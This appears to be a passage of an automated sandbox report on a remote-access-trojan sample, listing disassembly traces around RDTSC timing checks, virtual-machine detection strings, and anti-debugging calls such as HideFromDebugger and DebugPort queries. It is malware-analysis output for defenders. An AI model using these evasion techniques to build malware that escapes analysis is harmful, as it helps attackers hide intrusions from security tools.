                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9C00 second address: 4E9D14 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB1593E84h 0x00000007 mov ecx, ebx 0x00000009 shr dh, 00000004h 0x0000000c mov ecx, EECE932Dh 0x00000011 mov dx, word ptr [esp] 0x00000015 jmp 00007F8AB1593FE4h 0x0000001a xchg dword ptr [esp], esi 0x0000001d xchg edx, ecx 0x0000001f mov ax, di 0x00000022 lea edx, dword ptr [edx+edi] 0x00000025 mov dx, si 0x00000028 lea esi, dword ptr [esi-0000005Dh] 0x0000002e jmp 00007F8AB1593E58h 0x00000030 dec ax 0x00000032 lea ecx, dword ptr [F092C92Eh] 0x00000038 xchg dword ptr [esp], esi 0x0000003b mov ecx, dword ptr [esp] 0x0000003e not eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9D14 second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE8D2h 0x00000004 push dword ptr [esp] 0x00000007 retn 0004h 0x0000000a not dword ptr [ebp+00h] 0x0000000d mov ax, CF5Ah 0x00000011 push ecx 0x00000012 shr dh, 00000005h 0x00000015 jmp 00007F8AB0DEE9C0h 0x00000017 jle 00007F8AB0DEE966h 0x00000019 mov cx, word ptr [ebp+00h] 0x0000001d add eax, 9FCEE7F0h 0x00000022 jnc 00007F8AB0DEE96Dh 0x00000024 jc 00007F8AB0DEE96Bh 0x00000026 call 00007F8AB0DEE966h 0x0000002b pop dx 0x0000002d jmp 00007F8AB0DEE91Fh 0x0000002f mov dh, al 0x00000031 lea esp, dword ptr [esp+02h] 0x00000035 jmp 00007F8AB0DEE97Dh 0x00000037 sub ebp, 02h 0x0000003a mov dx, 8960h 0x0000003e xchg eax, edx 0x0000003f mov edx, dword ptr [esp] 0x00000042 jmp 00007F8AB0DEE9A0h 0x00000044 or word ptr [ebp+04h], cx 0x00000048 xchg ax, dx 0x0000004a lea edx, dword ptr [edx-00000AEDh] 0x00000050 mov ax, word ptr [esp] 0x00000054 jmp 00007F8AB0DEE91Eh 0x00000056 pushfd 0x00000057 pop dword ptr [ebp+00h] 0x0000005a lea edx, dword ptr [00000000h+edx*4] 0x00000061 mov edx, 457163FEh 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52A404 second address: 52A493 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 mov ax, word ptr [esp+01h] 0x00000008 lea edx, dword ptr [esi+45980130h] 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007F8AB1593E72h 0x00000013 mov dx, word ptr [esp] 0x00000017 mov ax, 82A6h 0x0000001b mov dl, ah 0x0000001d jmp 00007F8AB1594063h 0x00000022 lea edi, dword ptr [00000000h+ecx*4] 0x00000029 mov dx, word ptr [esp] 0x0000002d lea eax, dword ptr [esp+69177B39h] 0x00000034 pop edi 0x00000035 mov ax, bp 0x00000038 setle dl 0x0000003b jmp 00007F8AB1593D60h 0x00000040 not dx 0x00000043 push edx 0x00000044 xchg dh, al 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 499A83 second address: 499A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E88h 0x00000004 xchg cx, ax 0x00000007 adc cx, dx 0x0000000a call 00007F8AB1593EB4h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4C6876 second address: 4C6A49 instructions: 0x00000000 rdtsc 0x00000002 neg dl 0x00000004 mov eax, ecx 0x00000006 jmp 00007F8AB0DEEB0Ch 0x0000000b lea edi, dword ptr [edi+0005040Bh] 0x00000011 lea eax, dword ptr [CD6A2DD3h] 0x00000017 mov edx, 9C0D1359h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D99A3 second address: 48810D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E2Bh 0x00000004 sub ebp, 08h 0x00000007 pushfd 0x00000008 lea esp, dword ptr [esp] 0x0000000b jmp 00007F8AB1593EF0h 0x0000000d mov dword ptr [ebp+00h], edx 0x00000010 mov dh, al 0x00000012 sub esp, 18h 0x00000015 jnl 00007F8AB1593ECEh 0x00000017 jmp 00007F8AB1593E8Ah 0x00000019 xchg eax, ecx 0x0000001a bsr dx, si 0x0000001e jnc 00007F8AB1593EC9h 0x00000020 clc 0x00000021 cmc 0x00000022 mov dword ptr [ebp+04h], ecx 0x00000025 mov dx, word ptr [esp] 0x00000029 lea edx, dword ptr [00000000h+edx*4] 0x00000030 jmp 00007F8AB154265Eh 0x00000035 neg eax 0x00000037 jl 00007F8AB1593E02h 0x0000003d jmp 00007F8AB1593E7Dh 0x0000003f mov ecx, dword ptr [esp] 0x00000042 bsf cx, cx 0x00000046 neg ah 0x00000048 jmp 00007F8AB1593E81h 0x0000004a lea ecx, dword ptr [edi+50h] 0x0000004d clc 0x0000004e jp 00007F8AB1593EBDh 0x00000050 mov dl, C2h 0x00000052 mov dh, byte ptr [esp] 0x00000055 rcl dx, cl 0x00000058 jmp 00007F8AB1593EEEh 0x0000005a mov ah, ch 0x0000005c jmp 00007F8AB1593E7Dh 0x0000005e cmp ebp, ecx 0x00000060 jl 00007F8AB1593EE1h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D6526 second address: 4D65FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE980h 0x00000004 neg cl 0x00000006 lea eax, dword ptr [C399C3E4h] 0x0000000c lea eax, dword ptr [ecx+0000D6D8h] 0x00000012 lea eax, dword ptr [eax+esi] 0x00000015 jmp 00007F8AB0DEE96Dh 0x00000017 not cl 0x00000019 bswap eax 0x0000001b mov dx, ax 0x0000001e mov dx, word ptr [esp] 0x00000022 bsr ax, dx 0x00000026 jmp 00007F8AB0DEE99Eh 0x00000028 jle 00007F8AB0DEE908h 0x0000002a lea eax, dword ptr [edi-7CF34C86h] 0x00000030 shr dh, cl 0x00000032 jmp 00007F8AB0DEE92Ah 0x00000034 add cl, FFFFFF99h 0x00000037 push edx 0x00000038 mov ax, word ptr [esp+02h] 0x0000003d mov dh, 51h 0x0000003f push ax 0x00000041 jmp 00007F8AB0DEE96Bh 0x00000043 xchg dword ptr [esp], eax 0x00000046 lea esp, dword ptr [esp+02h] 0x0000004a lea esp, dword ptr [esp+04h] 0x0000004e sub cl, FFFFFF88h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D6540 second address: 4D65FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EB6h 0x00000004 neg cl 0x00000006 lea eax, dword ptr [C399C3E4h] 0x0000000c lea eax, dword ptr [ecx+0000D6D8h] 0x00000012 lea eax, dword ptr [eax+esi] 0x00000015 jmp 00007F8AB1593EBDh 0x00000017 not cl 0x00000019 bswap eax 0x0000001b mov dx, ax 0x0000001e mov dx, word ptr [esp] 0x00000022 bsr ax, dx 0x00000026 jmp 00007F8AB1593EEEh 0x00000028 jle 00007F8AB1593E58h 0x0000002a lea eax, dword ptr [edi-7CF34C86h] 0x00000030 shr dh, cl 0x00000032 jmp 00007F8AB1593E7Ah 0x00000034 add cl, FFFFFF99h 0x00000037 push edx 0x00000038 mov ax, word ptr [esp+02h] 0x0000003d mov dh, 51h 0x0000003f push ax 0x00000041 jmp 00007F8AB1593EBBh 0x00000043 xchg dword ptr [esp], eax 0x00000046 lea esp, dword ptr [esp+02h] 0x0000004a lea esp, dword ptr [esp+04h] 0x0000004e sub cl, FFFFFF88h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 479B98 second address: 479C13 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, dword ptr [esp] 0x00000005 call 00007F8AB0DEE988h 0x0000000a lea eax, dword ptr [edi+0000880Fh] 0x00000010 mov cx, dx 0x00000013 mov cx, word ptr [esp] 0x00000017 rcl ecx, 0Ch 0x0000001a jmp 00007F8AB0DEE975h 0x0000001c add al, ch 0x0000001e xchg dword ptr [esp], ebx 0x00000021 not edx 0x00000023 mov cl, dh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 479C13 second address: 4CFDF2 instructions: 0x00000000 rdtsc 0x00000002 lea eax, dword ptr [ecx-00004680h] 0x00000008 jmp 00007F8AB15EA036h 0x0000000d lea ebx, dword ptr [ebx+49h] 0x00000010 lea eax, dword ptr [ebx+esi] 0x00000013 dec edx 0x00000014 lea edx, dword ptr [eax+ebp] 0x00000017 xchg dx, ax 0x0000001a pushad 0x0000001b jmp 00007F8AB1593E7Ch 0x0000001d xchg dword ptr [esp+20h], ebx 0x00000021 mov ax, si 0x00000024 lea edx, dword ptr [ecx+000000CEh] 0x0000002a shr dx, cl 0x0000002d jmp 00007F8AB1593ED6h 0x0000002f cmc 0x00000030 mov eax, dword ptr [esp] 0x00000033 push dword ptr [esp+20h] 0x00000037 retn 0024h 0x0000003a not ch 0x0000003c sub esp, 1Ah 0x0000003f jl 00007F8AB15EA07Bh 0x00000045 jnl 00007F8AB15EA0D5h 0x0000004b lea esp, dword ptr [esp+02h] 0x0000004f call 00007F8AB1593E5Dh 0x00000054 xchg dx, cx 0x00000057 not ax 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D42B5 second address: 4D42D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, dword ptr [esp] 0x00000005 and ah, 0000007Ah 0x00000008 xchg dword ptr [esp], ebp 0x0000000b jmp 00007F8AB0DEE9C2h 0x0000000d bsf ax, dx 0x00000011 bswap edx 0x00000013 mov edx, 76495E28h 0x00000018 pushfd 0x00000019 lea ebp, dword ptr [ebp-0000001Bh] 0x0000001f bswap edx 0x00000021 jmp 00007F8AB0DEE8CCh 0x00000026 mov ah, byte ptr [esp] 0x00000029 sub esp, 08h 0x0000002c dec dh 0x0000002e mov al, cl 0x00000030 xchg dword ptr [esp+0Ch], ebp 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D42D0 second address: 4D431F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EC9h 0x00000004 bsr dx, dx 0x00000008 bsf edx, esp 0x0000000b mov edx, 770EE750h 0x00000010 mov ah, dh 0x00000012 push dword ptr [esp+0Ch] 0x00000016 retn 0010h 0x00000019 mov cx, word ptr [ebp+00h] 0x0000001d mov eax, E6083829h 0x00000022 jmp 00007F8AB1593EB2h 0x00000024 pushfd 0x00000025 rcl dl, cl 0x00000027 jnl 00007F8AB1593EFBh 0x00000029 xchg dx, ax 0x0000002c jmp 00007F8AB1593F21h 0x0000002e sub ebp, 02h 0x00000031 xchg dh, dl 0x00000033 lea edx, dword ptr [ebx-0000352Ah] 0x00000039 mov dx, D04Ah 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D431F second address: 4D4367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE990h 0x00000004 add word ptr [ebp+04h], cx 0x00000008 not eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4E9BCB second address: 4E9CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E7Dh 0x00000004 not dword ptr [ebp+00h] 0x00000007 mov ax, CF5Ah 0x0000000b push ecx 0x0000000c shr dh, 00000005h 0x0000000f jmp 00007F8AB1593F10h 0x00000011 jle 00007F8AB1593EB6h 0x00000013 mov cx, word ptr [ebp+00h] 0x00000017 add eax, 9FCEE7F0h 0x0000001c jnc 00007F8AB1593EBDh 0x0000001e jc 00007F8AB1593EBBh 0x00000020 call 00007F8AB1593EB6h 0x00000025 pop dx 0x00000027 jmp 00007F8AB1593E6Fh 0x00000029 mov dh, al 0x0000002b lea esp, dword ptr [esp+02h] 0x0000002f jmp 00007F8AB1593ECDh 0x00000031 sub ebp, 02h 0x00000034 mov dx, 8960h 0x00000038 xchg eax, edx 0x00000039 mov edx, dword ptr [esp] 0x0000003c jmp 00007F8AB1593EF0h 0x0000003e or word ptr [ebp+04h], cx 0x00000042 xchg ax, dx 0x00000044 lea edx, dword ptr [edx-00000AEDh] 0x0000004a mov ax, word ptr [esp] 0x0000004e jmp 00007F8AB1593E6Eh 0x00000050 pushfd 0x00000051 pop dword ptr [ebp+00h] 0x00000054 lea edx, dword ptr [00000000h+edx*4] 0x0000005b mov edx, 457163FEh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48AF3C second address: 48B06E instructions: 0x00000000 rdtsc 0x00000002 lea esp, dword ptr [esp+03h] 0x00000006 call 00007F8AB0DEE931h 0x0000000b jmp 00007F8AB0DEE975h 0x0000000d sub esp, 02h 0x00000010 neg ax 0x00000013 xchg dx, ax 0x00000016 rol edx, 1Ah 0x00000019 lea esp, dword ptr [esp+02h] 0x0000001d xchg dword ptr [esp], esi 0x00000020 jmp 00007F8AB0DEE967h 0x00000022 xchg ax, dx 0x00000024 sub esp, 04h 0x00000027 btr dx, bx 0x0000002b xchg word ptr [esp+01h], dx 0x00000030 mov dx, word ptr [esp+02h] 0x00000035 lea esi, dword ptr [esi+67h] 0x00000038 jmp 00007F8AB0DEE9A2h 0x0000003a lea eax, dword ptr [00000000h+ebp*4] 0x00000041 mov dh, ah 0x00000043 mov eax, esp 0x00000045 sub esp, 15h 0x00000048 lea esp, dword ptr [esp+01h] 0x0000004c xchg dword ptr [esp+18h], esi 0x00000050 jmp 00007F8AB0DEE924h 0x00000052 mov ah, byte ptr [esp] 0x00000055 pushad 0x00000056 push ecx 0x00000057 push dword ptr [esp+3Ch] 0x0000005b retn 0040h 0x0000005e xor cl, FFFFFFC2h 0x00000061 bsr eax, ebx 0x00000064 jmp 00007F8AB0DEE9A1h 0x00000066 jp 00007F8AB0DEE966h 0x00000068 mov ax, si 0x0000006b mov dx, word ptr [esp] 0x0000006f jmp 00007F8AB0DEE9B0h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024A7137 rdtsc 0_2_024A7137
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10001667 SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,GetLastError,SetupDiGetDeviceRegistryPropertyA,SetupDiGetDeviceRegistryPropertyA,GetLastError,GetLastError,GetLastError,LocalFree,GetLastError,_strcmpi,SetupDiSetClassInstallParamsA,GetLastError,SetupDiCallClassInstaller,GetLastError,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,0_2_10001667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeWindow / User API: threadDelayed 6349Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeWindow / User API: threadDelayed 454Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-54154
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI coverage: 7.0 %
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAPI coverage: 1.9 %
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188Thread sleep count: 136 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188Thread sleep time: -544000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6572Thread sleep count: 6349 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6572Thread sleep time: -63490s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 3524Thread sleep count: 165 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 3524Thread sleep time: -82500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188Thread sleep count: 454 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 6188Thread sleep time: -1816000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe TID: 3524Thread sleep count: 58 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread sleep count: Count: 6349 delay: -10Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,0_2_00409457
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,0_2_1000140B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,4_2_00409457
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,4_2_1000140B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040F151 GetSystemInfo,wsprintfA,0_2_0040F151
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClass
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:$
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(-}%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpF
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000677000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.0000000000817000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024A7137 rdtsc 0_2_024A7137
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024BE207 LdrInitializeThunk,0_2_024BE207
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040FB6E LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0040FB6E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022DB23D mov eax, dword ptr fs:[00000030h]0_2_022DB23D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h]0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h]0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h]0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C9218 mov eax, dword ptr fs:[00000030h]0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C9218 mov ecx, dword ptr fs:[00000030h]0_2_022C9218
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CD26E mov eax, dword ptr fs:[00000030h]0_2_022CD26E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A727B mov eax, dword ptr fs:[00000030h]0_2_022A727B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C424E mov eax, dword ptr fs:[00000030h]0_2_022C424E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C424E mov ecx, dword ptr fs:[00000030h]0_2_022C424E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022D4258 mov eax, dword ptr fs:[00000030h]0_2_022D4258
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC255 mov eax, dword ptr fs:[00000030h]0_2_022AC255
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022AC255 mov eax, dword ptr fs:[00000030h]0_2_022AC255
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF2A2 mov eax, dword ptr fs:[00000030h]0_2_022BF2A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BF2A2 mov ecx, dword ptr fs:[00000030h]0_2_022BF2A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov ecx, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022C82A2 mov eax, dword ptr fs:[00000030h]0_2_022C82A2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B12BA mov eax, dword ptr fs:[00000030h]0_2_022B12BA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B12BA mov eax, dword ptr fs:[00000030h]0_2_022B12BA
